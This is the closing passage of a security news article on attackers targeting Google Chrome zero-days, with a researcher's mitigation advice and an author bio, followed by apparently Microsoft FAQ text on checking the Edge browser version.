Saeed Abbasi, manager of vulnerability and threat research at Qualys, points to similar reasons for Chrome's growing popularity among threat actors. "Additionally, the high commercial value of exploiting a widely used platform like Chrome attracts sophisticated attackers, including those backed by state sponsors," he says.

More generally, browser vulnerabilities present significant risks for organizations, Abbasi says. Attackers can use browser bugs to sneak malware and spyware into an organization. Additionally, attackers might exploit these weaknesses to steal login credentials and other data for potential future attacks.

"To mitigate risks from browser vulnerabilities, organizations should prioritize regular updates and patch management to keep browsers up to date," Abbasi notes. "Implementing network segmentation can restrict browser access to sensitive areas, reducing breach impacts."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Google Patches Another Chrome Zero-Day as Browser Attacks Mount

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

Tag

#chrome